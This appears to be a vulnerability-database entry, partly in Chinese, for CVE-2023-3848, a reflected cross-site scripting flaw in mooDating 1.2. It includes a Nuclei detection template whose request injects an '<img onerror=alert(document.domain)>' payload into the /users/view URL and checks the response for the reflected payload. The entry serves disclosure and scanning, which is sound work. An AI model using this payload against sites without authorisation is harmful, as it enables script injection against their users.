CVE-2023-3848: MooDating 1.2 - Cross-site scripting

日期: 2025-08-01 | 影响软件: MooDating 1.2 | POC: 已公开

漏洞描述

A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.

PoC代码[已公开]

id: CVE-2023-3848

info:
  name: MooDating 1.2 - Cross-site scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely.
  reference:
    - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3848
    - https://vuldb.com/?ctiid.235199
    - https://vuldb.com/?id.235199
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3848
    cwe-id: CWE-79
    epss-score: 0.09808
    epss-percentile: 0.92689
    cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moosocial
    product: moodating
  tags: cve2023,cve,packetstorm,xss,moodating,moosocial

http:
  - method: GET
    path:
      - '{{BaseURL}}/users/viewi1omd"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity'

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<img src=a onerror=alert(document.domain)>", "mooDating")'
        condition: and
# digest: 4a0a00473045022100a26a5462bab2b6cdb32394f568ef47d7175aecc6b10489bc60a4668bee21329502200c5c0f0331e97c671a0efc30fb9d889de678fac981f23ffc21f9ec5ea927d490:922c64590222798bb761d5b6d8e72950

相关漏洞推荐